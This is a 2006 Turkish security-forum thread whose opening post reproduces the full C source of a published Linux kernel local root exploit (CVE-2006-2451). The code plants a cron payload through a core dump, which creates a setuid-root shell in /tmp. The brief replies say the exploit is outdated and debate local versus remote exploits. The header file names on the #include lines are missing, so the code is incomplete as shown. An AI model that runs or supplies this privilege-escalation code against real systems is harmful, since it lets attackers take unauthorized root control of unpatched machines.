Tahribat.com Forumları
Bilişim Güvenliği
Linux Kernel 2.6.13 <= 2.6.17.4 Sys_Prctl() Local Root Exploit

Yazar polymorphic (2) sandman (1) Tarantula (1) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Yapay Zeka     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Linux Kernel 2.6.13 <= 2.6.17.4 Sys_Prctl() Local Root Exploit

1. 05/Ağu/06 14:12 Kısayol Şikayet Özel Mesaj
   gXgX
   
   

   Kayıt Tarihi: 04/Ağustos/2006
   

   Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl Local Root Exploit
   
   
   /*****************************************************/
   /* Local r00t Exploit for: */
   /* Linux Kernel PRCTL Core Dump Handling */
   /* ( BID 18874 / CVE-2006-2451 ) */
   /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4
   /* By: */
   /* - dreyer (main PoC code) */
   /* - RoMaNSoFt (local root code) */
   /* [ 10.Jul.2006 ] */
   /*****************************************************/
   
   #include
   #include
   #include
   #include
   #include
   #include
   #include
   #include
   
   char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
   
   int main() {
   int child;
   struct rlimit corelimit;
   printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
   printf("By: dreyer & RoMaNSoFt\n");
   printf("[ 10.Jul.2006 ]\n\n");
   
   corelimit.rlim_cur = RLIM_INFINITY;
   corelimit.rlim_max = RLIM_INFINITY;
   setrlimit(RLIMIT_CORE, &corelimit);
   
   printf("[*] Creating Cron entry\n");
   
   if ( !( child = fork() )) {
   chdir("/etc/cron.d");
   prctl(PR_SET_DUMPABLE, 2);
   sleep(200);
   exit(1);
   }
   
   kill(child, SIGSEGV);
   
   printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
   sleep(62);
   
   printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
   system("/tmp/sh -i");
   }
   
   // milw0rm.com [2006-07-11]
   
   
   Alıntı yap
2. 05/Ağu/06 14:14 Kısayol Şikayet Özel Mesaj
   Tarantula
   
   

   Kayıt Tarihi: 12/Temmuz/2006
   

   hoca bu ne?

   ---

   Olmayacak şeyler tasarlıyorum, işim bu..
   Alıntı yap
3. 05/Ağu/06 14:14 Kısayol Şikayet Özel Mesaj
   polymorphic
   
   

   Kayıt Tarihi: 16/Eylül/2005
   

   eskidi bu artik bildigim en dandik server bile patch etmis :)
   
   islemez...

   ---

   Real programmers can write assembly code in any language. :-)
   Alıntı yap
4. 05/Ağu/06 14:16 Kısayol Şikayet Özel Mesaj
   All hail to Tux
   sandman
   
   

   Kayıt Tarihi: 01/Eylül/2005
   

   linux 2.6 çekirdegine sahip bir pcde root şifresini almak... tabii bunu dışardan kullanamıyorsun eh pcnin başına oturduktan sonra root şifresini almak sorun olmamalı

   ---

   Mühendis kahveyi projeye dönüştüren bir insan evladıdır.
   Alıntı yap
5. 05/Ağu/06 14:30 Kısayol Şikayet Özel Mesaj
   polymorphic
   
   

   Kayıt Tarihi: 16/Eylül/2005
   

   local root diyor password disclosure demiyor her ikiside local pc basinda oturmadan root olabilirsin :)
   
   local ile remote exploit e bir daha goz at istersen :))

   ---

   Real programmers can write assembly code in any language. :-)
   Alıntı yap

Cevapla